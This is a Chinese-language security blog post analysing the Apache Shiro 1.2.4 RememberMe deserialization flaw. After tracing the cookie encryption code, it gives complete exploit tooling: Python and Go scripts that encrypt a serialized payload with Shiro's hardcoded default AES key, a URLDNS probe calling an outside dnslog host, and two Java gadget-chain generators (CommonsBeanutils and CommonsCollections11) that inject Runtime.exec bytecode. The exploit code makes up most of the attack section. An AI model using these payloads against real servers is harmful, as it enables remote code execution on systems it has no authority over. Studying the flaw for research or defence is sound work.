基本概述
Apache Shiro是一个开源的Java安全框架,用于身份验证、授权和加密。它提供了一个简单而强大的API,使开发人员能够轻松地实现安全功能。
Apache Shiro的主要功能包括:
- 身份验证:提供了用户身份验证的功能,包括基于用户名和密码的验证、基于令牌的验证(如JWT)以及自定义的验证方式。
- 授权:提供了对用户进行授权的功能,可以根据用户的角色、权限等进行访问控制。
- 会话管理:可以管理用户的会话,包括会话的创建、销毁、读写等操作。
- 密码加密:提供了密码加密和解密的功能,帮助开发人员保护用户密码的安全。
- Web集成:提供了与Web应用程序的集成支持,可以轻松地将Shiro与常见的Web框架(如Spring MVC)集成在一起。
Apache Shiro框架提供了RememberMe记住我的功能,用户登陆成功后会生成经过加密并编码的Cookie,在服务端接收cookie值后进行Base64解码–>AES解密–>反序列化。
攻击者只要找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化–>AES加密–>Base64编码,然后将其作为Cookie的RememberMe字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。
调试分析环境
Apache Shiro下载地址:https://github.com/apache/shiro/releases/tag/shiro-root-1.2.4
Apache Shiro <= 1.2.4
JDK8u65
Apache Tomcat9.0.65
漏洞原理分析
加密分析
当我们输入账号密码登录后,如果登录成功,则会进入 AbstractRememberMeManager.onSuccessfulLogin 方法,该方法有三个参数,分别是 Subject、AuthenticationToken 和 AuthenticationInfo
Subject表示当前用户的身份,可以通过SecurityUtils.getSubject()方法获得。Subject是进行身份验证和授权操作的主体对象。通过Subject,可以执行身份验证、授权和会话管理等操作。AuthenticationToken是一个包含用户身份凭证的对象,用于表示用户提交的身份验证信息。在身份验证过程中,应用程序通常会将用户提供的用户名和密码封装到AuthenticationToken对象中。AuthenticationToken的实现通常由应用程序根据实际情况提供。AuthenticationInfo表示用户的身份验证信息,包括身份凭证(如用户名、密码)和相关的认证数据(如角色、权限等)。AuthenticationInfo对象用于在身份验证过程中验证用户提供的凭证是否正确,并提供用户的身份信息给Shiro使用。

如果在登录时,勾选了记住我的选项,那么在token中 rememberme 值就为true

这里会调用到 getIdentityToRemember 方法

这个方法的主要作用就是用于获取记住身份的标识

在 rememberIdentity 方法里面就是对记住用户身份功能进行一个实现了

convertPrincipalsToBytes 方法对记住身份的标识转成字节数组

在这个方法里面其实就是将身份标识进行序列化成字节数组,然后判断了 CipherService 对象不为null的话就调用 encrypt 方法对序列化后的字节数组进行加密再返回

getCipherService 方法里面返回了 cipherService 对象,该对象就是一个AES加密服务对象,可以看到加密模式为CBC

在 encrypt 方法中调用了AES加密服务对象对其加密





getEncryptionCipherKey 方法就是获取了加密的key,这个key是在 AbstractRememberMeManager 类的构造方法中进行设置的

后面就是调用了 cipherService.encrypt 方法将key和身份标识进行了AES加密,返回了使用key进行AES加密的字节数组


在 CookieRememberMeManager 类 rememberSerializedIdentity 方法中前半部分判断了是不是HTTP请求的,然后使用 WebUtils 类获取了 request 和 response 对象,将使用key加密身份标识后的字节数组进行Base64编码

后面就不过多介绍了,就是设置Cookie了,这就是Shiro从登录成功到设置Cookie的加密身份标识的过程
解密分析


解密分析当然也是在 CookieRememberMeManager 类中,getRememberedSerializedIdentity 方法用于读取Cookie,这里要注意的是在Cookie中不能带有 deleteMe,ensurePadding 方法用来填充我们传入的Base64编码的Cookie,确保数据长度符合加密算法的要求,再往后就是对我们传入的Cookie进行Base64解码成字节数组了
返回了这个解码后的字节数组,我们看下是在哪里调用了这个方法

发现在 AbstractRememberMeManager 类的 getRememberedPrincipals 方法中调用了 getRememberedSerializedIdentity 这个方法
后面调用了 convertBytesToPrincipals 方法将AES加密的字节数组转成 Principal 对象

在该方法中调用了 decrypt 解密方法

这里就和加密分析那边反过来,这里是调用了 cipherService 类的 decrypt 方法来进行解密,然后返回了解密后的序列化字节数组

将解密后的字节数组作为参数调用了 deserialize 方法


deserialize 方法中使用了默认序列化器进行了反序列化,如果我们将恶意的类进行序列化生成 ser.bin 文件,将序列化的文件内容使用Shiro默认key进行加密,再经过Base64编码即可执行恶意代码
漏洞利用脚本
根据上面的分析,写出以下两种语言的读取序列化文件内容进行AES加密再Base64编码脚本
Python
import base64
from turtle import mode
import uuid
from Crypto.Cipher import AES
def get_file_data(filename):
with open(filename, 'rb') as f:
data = f.read()
return data
def aes_enc(data):
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(data)))
return ciphertext
def aes_dec(enc_data):
enc_data = base64.b64decode(enc_data)
unpad = lambda s: s[:-s[-1]]
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = enc_data[:16]
encryptor = AES.new(base64.b64decode(key), mode, iv)
plaintext = encryptor.decrypt(enc_data[16:])
plaintext = unpad(plaintext)
return plaintext
if __name__ == "__main__":
data = get_file_data("ser.bin")
print(aes_enc(data))
Go
package main
import (
"fmt"
"os"
)
func main() {
key := "kPH+bIxk5D2deZiIxcaaaA=="
file, err := os.ReadFile("./ser.bin")
if err != nil {
panic(err)
}
encrypt, err := Encrypt(key, file)
if err != nil {
fmt.Println(err)
return
}
fmt.Println(string(encrypt))
//decrypt, err := Decrypt(key, string(encrypt))
//if err != nil {
// fmt.Println(err)
// return
//}
//fmt.Println(string(decrypt))
}
package main
import (
"crypto/aes"
"crypto/cipher"
"crypto/rand"
"encoding/base64"
"errors"
"io"
)
func Encrypt(key string, src []byte) (data []byte, err error) {
decodeKey, err := base64.StdEncoding.DecodeString(key)
if err != nil {
panic(err)
}
block, err := aes.NewCipher(decodeKey)
if err != nil {
return nil, err
} else if len(src) == 0 {
return nil, errors.New("src is empty")
}
plaintext, err := pkcs7Pad(src, block.BlockSize())
if err != nil {
return nil, err
}
ciphertext := make([]byte, aes.BlockSize+len(plaintext))
iv := ciphertext[:aes.BlockSize]
if _, err := io.ReadFull(rand.Reader, iv); err != nil {
return nil, err
}
bm := cipher.NewCBCEncrypter(block, iv)
bm.CryptBlocks(ciphertext[aes.BlockSize:], plaintext)
ciphertext = []byte(base64.StdEncoding.EncodeToString(ciphertext))
return ciphertext, nil
}
func Decrypt(key, src string) (data []byte, err error) {
decodeKey, err := base64.StdEncoding.DecodeString(key)
if err != nil {
panic(err)
}
decodeSrc, err := base64.StdEncoding.DecodeString(src)
if err != nil {
panic(err)
}
if len(src) < aes.BlockSize {
return nil, errors.New("data length error")
}
iv := decodeSrc[:aes.BlockSize]
ciphertext := decodeSrc[aes.BlockSize:]
if len(ciphertext)%aes.BlockSize != 0 {
return nil, errors.New("ciphertext is not a multiple of the block size")
}
block, err := aes.NewCipher(decodeKey)
if err != nil {
return nil, err
}
bm := cipher.NewCBCDecrypter(block, iv)
bm.CryptBlocks(ciphertext, ciphertext)
ciphertext, err = pkcs7Unpad(ciphertext, aes.BlockSize)
if err != nil {
return nil, err
}
return ciphertext, nil
}
package main
import (
"bytes"
"errors"
)
func pkcs7Pad(src []byte, blockSize int) (dest []byte, err error) {
if blockSize <= 0 {
return nil, errors.New("block size is 0")
} else if src == nil || len(src) == 0 {
return nil, errors.New("src is nil")
}
n := blockSize - (len(src) % blockSize)
pb := make([]byte, len(src)+n)
copy(pb, src)
copy(pb[len(src):], bytes.Repeat([]byte{byte(n)}, n))
return pb, nil
}
func pkcs7Unpad(src []byte, blockSize int) (dest []byte, err error) {
if blockSize <= 0 {
return nil, errors.New("block size is 0")
} else if len(src)%blockSize != 0 {
return nil, errors.New("src length error")
} else if src == nil || len(src) == 0 {
return nil, errors.New("src is nil")
}
c := src[len(src)-1]
padLength := int(c)
if padLength == 0 || padLength > len(src) {
return nil, errors.New("pad length error")
}
for i := 0; i < padLength; i++ {
if src[len(src)-padLength+i] != c {
return nil, errors.New("pad content error")
}
}
return src[:len(src)-padLength], nil
}
利用链EXP编写
存在的问题
- Commons-Beanutils库服务端和生成恶意序列化字节码使用的版本一致
如果使用不同的版本,serialVersionUID 可能会不一样,导致无法反序列化
org.apache.commons.collections.comparators.ComparableComparator依赖Commons-Collections环境
由于 org.apache.commons.collections.comparators.ComparableComparator 类使用了Commons-Collections
URLDNS
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;
public class URLDNS implements Serializable {
public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
HashMap<URL,Integer> hashmap= new HashMap<URL,Integer>();
URL url = new URL("http://shiro.f32v.dnslog.ink/");
Class c = url.getClass();
Field hashcodefile = c.getDeclaredField("hashCode");
hashcodefile.setAccessible(true);
hashcodefile.set(url,1234);
hashmap.put(url,1);
hashcodefile.set(url,-1);
serialize(hashmap,"ser.bin");
}
public static void serialize(Object obj, String obj_file) throws IOException {
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(obj_file));
objectOutputStream.writeObject(obj);
objectOutputStream.close();
}
}

URLDNS链常用来探测漏洞是否存在,该链不需要任何依赖
不依赖Commons-Collections
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;
import java.io.*;
import java.lang.reflect.Field;
import java.util.PriorityQueue;
public class CommonsBeanutils183_Shiro {
public static void main(String[] args) throws Exception{
ClassPool classPool = ClassPool.getDefault();
classPool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
CtClass ctClass = classPool.makeClass("EvilCode");
ctClass.makeClassInitializer().insertBefore("java.lang.Runtime.getRuntime().exec(\"open /System/Applications/Calculator.app\");");
ctClass.setName("EvilCode" + System.nanoTime());
ctClass.setSuperclass(classPool.get(AbstractTranslet.class.getName()));
byte[] bytecode = ctClass.toBytecode();
byte[][] bytecodes = new byte[][]{bytecode};
TemplatesImpl templates = TemplatesImpl.class.newInstance();
Class templateImplClass = templates.getClass();
Field nameField = templateImplClass.getDeclaredField("_name");
nameField.setAccessible(true);
nameField.set(templates,"x");
Field bytecodesField = templateImplClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
bytecodesField.set(templates,bytecodes);
Field tfactoryField = templateImplClass.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());
BeanComparator beanComparator = new BeanComparator();
PriorityQueue<Object> queue = new PriorityQueue<Object>(beanComparator);
queue.add(1);
queue.add(1);
Class priorityQueueClass = queue.getClass();
Field queueField = priorityQueueClass.getDeclaredField("queue");
queueField.setAccessible(true);
queueField.set(queue,new Object[]{templates, templates});
Class beanComparatorClass = beanComparator.getClass();
Field propertyField = beanComparatorClass.getDeclaredField("property");
propertyField.setAccessible(true);
propertyField.set(beanComparator,"outputProperties");
Field comparatorField = beanComparatorClass.getDeclaredField("comparator");
comparatorField.setAccessible(true);
comparatorField.set(beanComparator,new AttrCompare());
serialize(queue);
//unserialize("ser.bin");
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
}
依赖Commons-Collections
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.functors.InvokerTransformer;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
public class CommonsCollections11 {
public static void main(String[] args) throws Exception {
ClassPool classPool = ClassPool.getDefault();
classPool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
CtClass ctClass = classPool.makeClass("EvilCode");
ctClass.makeClassInitializer().insertBefore("java.lang.Runtime.getRuntime().exec(\"open /System/Applications/Calculator.app\");");
ctClass.setName("EvilCode" + System.nanoTime());
ctClass.setSuperclass(classPool.get(AbstractTranslet.class.getName()));
byte[] bytecode = ctClass.toBytecode();
byte[][] bytecodes = new byte[][]{bytecode};
TemplatesImpl templates = TemplatesImpl.class.newInstance();
Class templateImplClass = templates.getClass();
Field nameField = templateImplClass.getDeclaredField("_name");
nameField.setAccessible(true);
nameField.set(templates,"x");
Field bytecodesField = templateImplClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
bytecodesField.set(templates,bytecodes);
Field tfactoryField = templateImplClass.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());
InvokerTransformer transformer = new InvokerTransformer("aaa", new Class[]{}, new Object[]{});
HashMap innermap = new HashMap();
LazyMap lazyMap = (LazyMap) LazyMap.decorate(innermap,transformer);
TiedMapEntry tiedmap = new TiedMapEntry(lazyMap,templates);
HashSet hashset = new HashSet(1);
hashset.add("a");
// 为了兼容JDK8以下版本
Field mapField;
try{
mapField = HashSet.class.getDeclaredField("map");
}catch(NoSuchFieldException e){
mapField = HashSet.class.getDeclaredField("backingMap");
}
mapField.setAccessible(true);
HashMap hashset_Map = (HashMap) mapField.get(hashset);
Field tableField;
try{
tableField = HashMap.class.getDeclaredField("table");
}catch (NoSuchFieldException e){
tableField = HashMap.class.getDeclaredField("elementData");
}
tableField.setAccessible(true);
Object[] array = (Object[]) tableField.get(hashset_Map);
Object node = array[0];
if (node == null){
node = array[1];
}
Field keyField;
try{
keyField = node.getClass().getDeclaredField("key");
}catch (NoSuchFieldException e){
keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
}
keyField.setAccessible(true);
keyField.set(node,tiedmap);
Field iMethodNameField = transformer.getClass().getDeclaredField("iMethodName");
iMethodNameField.setAccessible(true);
iMethodNameField.set(transformer,"newTransformer");
serialize(hashset);
//deserialize("ser.bin");
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
objectOutputStream.writeObject(obj);
}
public static Object deserialize(String filename) throws IOException, ClassNotFoundException {
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
return objectInputStream.readObject();
}
}
环境中存在Commons-Collections依赖的话利用链就更多了,这里只使用了CC11的利用链
Author: wileysec
Permalink: https://wileysec.github.io/9ca83d5eef7a.html
Comments